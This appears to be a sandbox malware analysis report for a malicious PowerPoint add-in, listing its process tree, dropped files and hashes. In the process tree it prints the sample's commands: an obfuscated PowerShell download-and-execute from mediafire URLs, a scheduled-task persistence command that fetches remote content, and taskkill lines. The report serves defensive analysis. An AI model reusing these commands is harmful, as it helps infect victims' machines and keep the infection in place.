C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:13⤵
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\ddond.comC:\ProgramData\ddond.com https://taxfile.mediafire.com/file/v9m1dw47xgtetw9/14.htm/file4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file'))));Invoke-Expression $MMMMMMM5⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 82 /tn calendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/8pmejv253qhljtn/14.htm/file"""5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WinWord.exe5⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe5⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe5⤵
- Kills process with taskkill
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff759d75460,0x7ff759d75470,0x7ff759d754804⤵
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""3⤵
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Downloads\14 (1).ppam" /ou ""3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:32⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"3⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\ddond.comFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\ProgramData\ddond.comFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6Filesize
471B
MD51fca0539de02091fc4d207211364e566
SHA161a6af3a2153a70277b7de7495ecef4110bb9989
SHA256e6a9491850b7d6fc6bd7d592a8ff4fc057952a137abb7d3d39b3d0bb3b8f667b
SHA512a1a657812f96ef839d793ffb6f249765ed24e906f5b3a22872c52e5b687480fdd7cc2334956e42198d70fa931f77ef50cbc8e1aaae6959ba3036a9035eeea823
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868Filesize
471B
MD561bbc21b6075c76df0e0ed177c534185
SHA1efcec703b65ae25e95736755f0fd80cdb5569c13
SHA2560c2f98b4f41006d5bee3534e07ff7047cffd42c7f53f4ce6861d458e96457164
SHA512a31af35f8fb5a566fa02c40156693db6ba54d75b8a3e3acac65cbc9e1d4eb9ea627f395bacfb3ac0b9854d9ef29f0e16ea958ebfe8201cff70096ff90ef61727
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECEFilesize
471B
MD5c6f11751f23f273c02be06f64ca0e2f2
SHA143dd2140da95c53f964ef88db67187451581625f
SHA256063e20533cd1e709c8c1965ccd1cfbff2b3c6a37683f03a244da1a5101a3bc81
SHA51223e69bede2c1fee2f559f00aeb69c122f4c987c76d6455fa1ff484dc23008566b02edd93ee6a57c179c71e71114a0638c948900b4fff5b731ff99e81cbeae001
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6Filesize
434B
MD56756c40edf649ec888c0e888446cacb9
SHA159ad25a4a9ff545995b5bcce1abd411e7f07060a
SHA256794f4be6bac263da5983ef90891f923230f14f15b4c68b60c2248b834f0526d2
SHA512af6022b791d65c83d50205c498dd8fd76d70e8cf7563b373024fd9887b8d9400d4b6cfd7cd72084a94447127afc1e1a3de28984af5eef1ae2a2ef182354a1ac9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868Filesize
442B
MD5bfa52515350fe02ef978aed07e758049
SHA195972681781c46b22c5adc90bffed1e94f09d64c
SHA256d584b8348f562647b43f0769750b05bafe94194188fe695aea3b1fff3c334eff
SHA51228ba9afed478d4ab4f413de12040b27d7966eaa6958b96fa57bf430ad4a95f94cf3866f7a5e6e44b559ca5b30d383b26248d10ecdf5232194c786ef79f9f3245
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECEFilesize
446B
MD54dd1120e370440f036f0ff39feb41deb
SHA1e715b0fd2932db814e29c1b55fb8b690970812d9
SHA25617a92d4c5dd525dd6f795b9bd6428a6047f60e0515b939d39218ee740cd550be
SHA512e4fae14b67ea0351d6cb18a84d95b13aa7bd1bddeed4f7da536afb9e336615c20416f8a6181a8c8538a4f33da1a1ff3ceb6facd576f8bffd37aab5115fd08903
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD50f2fd3ffef216b4a9345a3bf7c19e54c
SHA1bb53767f6009d83c4af27ddb9f72b88d2dea8c1c
SHA2564587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a
SHA5125987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD50f2fd3ffef216b4a9345a3bf7c19e54c
SHA1bb53767f6009d83c4af27ddb9f72b88d2dea8c1c
SHA2564587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a
SHA5125987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD50f2fd3ffef216b4a9345a3bf7c19e54c
SHA1bb53767f6009d83c4af27ddb9f72b88d2dea8c1c
SHA2564587b60ec8ed42f34c0c85604a70363bd7e82b5dac6b6e14629e3a5672b3e98a
SHA5125987b7af8b369ad6208688a59562c6d187b45a64cc307af5d96da4cbfc6c146c71bcc493f9a66bf23d2d249416222bb728e9072a44a7d9a13355647768b32900
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD595e22ee8bac6765a868c13fc5ca5017c
SHA1dff7d454639c700bb4408bf2cef900337977eb56
SHA256cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802
SHA51247fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD595e22ee8bac6765a868c13fc5ca5017c
SHA1dff7d454639c700bb4408bf2cef900337977eb56
SHA256cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802
SHA51247fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD595e22ee8bac6765a868c13fc5ca5017c
SHA1dff7d454639c700bb4408bf2cef900337977eb56
SHA256cb320ebc79962dfd60205d687132b62ac884924f6cf5c5a40aea28fd2bc44802
SHA51247fb43256f59834aaf626e3c9c9e20f71afbb018f64755d8e05f6cbd8dde21e1c14049192a90bffd99413a58a0cacebdd8bce7b3d464aa622d7eefad71145428
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD51c3983e2604936fa4420627b5fdcb6f5
SHA183991de09f6bae339679274f874188ff154d72f8
SHA2566762e25a87c7acf43482319e524c55a25550d898762b78972f5771903697176c
SHA5122e943097f3c98ba2591ea467effb4314025222c3bc4a10effc875cb0bba7899be7b09e2777a144854f3093d47cbde49d3a0d96ff06e674341d26f4af41290c4a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettingsFilesize
81B
MD5f222079e71469c4d129b335b7c91355e
SHA10056c3003874efef229a5875742559c8c59887dc
SHA256e713c1b13a849d759ebaa6256773f4f1d6dfc0c6a4247edaa726e0206ecacb00
SHA512e5a49275e056b6628709cf6509a5f33f8d1d1e93125eaa6ec1c7f51be589fd3d8ea7a59b9639db586d76a994ad3dc452c7826e4ac0c8c689dd67ff90e33f0b75
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1Filesize
126KB
MD56698422bea0359f6d385a4d059c47301
SHA1b1107d1f8cc1ef600531ed87cea1c41b7be474f6
SHA2562f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
SHA512d0cdb3fa21e03f950dbe732832e0939a4c57edc3b82adb7a556ebd3a81d219431a440357654dfea94d415ba00fd7dcbd76f49287d85978d12c224cbfa8c1ad8d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUrisFilesize
40B
MD595878acc2f35f7e0cab25eafa5a0015d
SHA1e673cb8e7108c1df1e1f6c6dd038bdfae0b640af
SHA256b732281984e203f7511780bc3622d4d96dcb1fad3c8bac69077572e16f71c1ff
SHA5124e26bf0ba35e4a8900bd264527242a6e015d786b3c5a470188058097be68f55f7c8b8aaca607f2b8e0cf3b5caea80b4a1c12125ffe163ec4ebdaec6fb9079965
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_637884115190248201Filesize
8KB
MD5d8d19e98fc8a233efa5c1792813ed8b2
SHA13126b9b3144b2bb299930fa500408de8bf383827
SHA256624e7f0f1df15e5dba4b8189a40d15949b143fb7ef866e26d76524bd5a1df3d1
SHA512e09b774c107b8a1ab78cc4695e4690c54c80df8df8a13a1d2abac986ad0c309d3ed81f4e697d72054b6f5590ef01a7604f3d202096b12d69c92d860cd5cd9343
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTrafficFilesize
29B
MD5ce545b52b20b2f56ffb26d2ca2ed4491
SHA1ebe904c20bb43891db4560f458e66663826aa885
SHA256e9d5684e543b573010f8b55b11bf571caf0a225cdea03f520091525978023899
SHA5121ea06c8e3f03efdd67779969b4cdf7d8e08f8327298668a7cffd67d1753f33cf19e6995a3d83fe45185c55b950f41e48ac71b422b91e8d0180b5bdd07cfacfe9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_637811103879324684Filesize
450KB
MD5a7aab197b91381bcdec092e1910a3d62
SHA135794f2d2df163223391a2b21e1610f14f46a78f
SHA2566337fe4e6e7464e319dfcdadf472987592013cf80d44916f5151950b4a4ca14b
SHA512cffd7350d1e69ada5f64cafe42a9d77e3192927e129f2903088b66b6efc9626b5d525aedca08d473ad8fa415af1d816594b243609237dc23716d70a2ca0eb774
-
C:\Users\Admin\AppData\Local\Temp\6647D6D.tmpFilesize
76B
MD50479715df4c22e9a75db1e132e8e9f74
SHA1c7daced7176bb34f6839e1ee91f207c5359b05eb
SHA25646759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
SHA512e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
-
C:\Users\Admin\AppData\Local\Temp\7807D6D.tmpFilesize
76B
MD50479715df4c22e9a75db1e132e8e9f74
SHA1c7daced7176bb34f6839e1ee91f207c5359b05eb
SHA25646759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
SHA512e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
-
C:\Users\Admin\AppData\Local\Temp\7C47D6D.tmpFilesize
76B
MD50479715df4c22e9a75db1e132e8e9f74
SHA1c7daced7176bb34f6839e1ee91f207c5359b05eb
SHA25646759208a69138d6448963ca068b9e8328dd02896ceb1743489e3b9df36d448e
SHA512e3365ec38729b8f47b88b0e64f2fe438c3402001920c6ad3ed53f8b93b4d8f3acd997c553b584572c0a697febb2da0aebf7d4f43a146c7330a47969644981501
-
C:\Users\Admin\Downloads\14 (1).ppamFilesize
41KB
MD566367046957810309248fcec536d7ccb
SHA15a118ce3f251140e852927503a3743442c68ff63
SHA25626c3bd6b866dd452546949e169dfd0934cf53681fe53d63efa2a16db39cf131b
SHA5121698fc41e4fe3bfd61841e9ec50a2461583d58cc5fafb00fb3c6a31460b0b866a7c96762da22de840f2081fb8524808e0177697860582aed6b33365a62f1fd08
-
\??\pipe\LOCAL\crashpad_3484_KRNRFHMUSJHCEHABMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\LOCAL\crashpad_4500_JKXGEPWAYAAQMAINMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/216-130-0x0000000000000000-mapping.dmp
-
memory/804-265-0x0000000000000000-mapping.dmp
-
memory/1188-167-0x0000000000000000-mapping.dmp
-
memory/1296-180-0x0000000000000000-mapping.dmp
-
memory/1348-153-0x0000000000000000-mapping.dmp
-
memory/1472-141-0x0000000000000000-mapping.dmp
-
memory/1592-142-0x0000000000000000-mapping.dmp
-
memory/1720-188-0x0000000000000000-mapping.dmp
-
memory/1748-168-0x0000000000000000-mapping.dmp
-
memory/2004-182-0x0000000000000000-mapping.dmp
-
memory/2836-186-0x0000000000000000-mapping.dmp
-
memory/3064-147-0x0000000000000000-mapping.dmp
-
memory/3120-156-0x0000000000000000-mapping.dmp
-
memory/3180-266-0x0000000000000000-mapping.dmp
-
memory/3484-133-0x0000000000000000-mapping.dmp
-
memory/3612-165-0x0000000000000000-mapping.dmp
-
memory/3648-132-0x0000000000000000-mapping.dmp
-
memory/3828-269-0x0000000000000000-mapping.dmp
-
memory/3828-150-0x0000000000000000-mapping.dmp
-
memory/4000-184-0x0000000000000000-mapping.dmp
-
memory/4000-236-0x0000000000000000-mapping.dmp
-
memory/4104-192-0x0000000000000000-mapping.dmp
-
memory/4336-136-0x0000000000000000-mapping.dmp
-
memory/4500-155-0x0000000000000000-mapping.dmp
-
memory/4680-190-0x0000000000000000-mapping.dmp
-
memory/4776-166-0x0000000000000000-mapping.dmp
-
memory/4992-256-0x0000000000000000-mapping.dmp
-
memory/5176-235-0x0000000000000000-mapping.dmp
-
memory/5176-193-0x0000000000000000-mapping.dmp
-
memory/5236-195-0x0000000000000000-mapping.dmp
-
memory/5252-196-0x0000000000000000-mapping.dmp
-
memory/5360-230-0x0000000000000000-mapping.dmp
-
memory/5388-199-0x0000000000000000-mapping.dmp
-
memory/5404-201-0x0000000000000000-mapping.dmp
-
memory/5572-237-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmpFilesize
64KB
-
memory/5572-204-0x0000000000000000-mapping.dmp
-
memory/5572-231-0x00007FFB3EDB0000-0x00007FFB3EDC0000-memory.dmpFilesize
64KB
-
memory/5572-215-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5572-213-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5572-211-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5732-248-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5732-209-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5732-205-0x0000000000000000-mapping.dmp
-
memory/5732-239-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5732-245-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5732-242-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5732-220-0x00007FFB41170000-0x00007FFB41180000-memory.dmpFilesize
64KB
-
memory/5808-206-0x0000000000000000-mapping.dmp
-
memory/5860-267-0x0000000000000000-mapping.dmp
-
memory/5924-207-0x0000000000000000-mapping.dmp
-
memory/5928-268-0x0000000000000000-mapping.dmp
-
memory/6016-208-0x0000000000000000-mapping.dmp
-
memory/6084-216-0x0000000000000000-mapping.dmp